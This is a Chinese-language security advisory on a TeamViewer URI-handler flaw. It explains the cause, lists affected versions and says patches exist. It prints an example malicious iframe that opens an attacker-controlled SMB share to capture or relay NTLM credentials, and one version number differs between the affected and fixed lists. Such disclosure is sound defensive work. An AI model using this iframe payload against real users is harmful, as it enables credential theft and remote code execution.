一、情况分析
TeamViewer是由德国TeamViewer公司开发的一款用于远程控制、桌面共享的软件,可用于Windows,macOS,Linux等多种操作系统,是目前国内外应用最为广泛的远程访问程序之一。
近日,TeamViewer官方发布了TeamViewer URL处理的风险通告,TeamViewer存在未引用的搜索路径或元素的安全缺陷,攻击者不需要进行身份验证即可获取访问权限。
漏洞原理
TeamViewer存在未引用的搜索路径或元素的安全缺陷,由于应用程序没有正确引用其自定义URI处理程序,导致程序将参数视为系统命令而不是值。攻击者可以使用特制的URL(iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs')将恶意iframe嵌入恶意网站中,当安装了受影响TeamViewer软件的系统访问恶意网页时,使得用户WEB浏览器中加载该iframe,从而启动TeamViewer Windows桌面客户端程序并强制其打开远程SMB共享。
Windows将在打开SMB共享时,执行NTLM身份验证,并且可以转发该请求(使用如响应程序之类的工具)以执行代码(或捕获该请求以进行哈希破解)。
该漏洞的利用可以远程启动,并且由于是受害者的计算机发起与攻击者的SMB共享连接,因此攻击者不需要进行身份验证即可获取访问权限。
二、影响范围
TeamViewer < 8.0.258861
TeamViewer < 9.0.28860
TeamViewer < 10.0.258873
TeamViewer < 11.0.258870
TeamViewer < 12.0.258869
TeamViewer < 13.2.36220
TeamViewer < 14.2.56676
TeamViewer < 15.8.3
三、处置建议
目前厂商已发布补丁,版本8.0.258861、9.0.258860、10.0.258873、11.0.258870、12.0.258869、13.2.36220、14.2.56676、14.7.48350和15.8.3中已修复,不受此漏洞影响。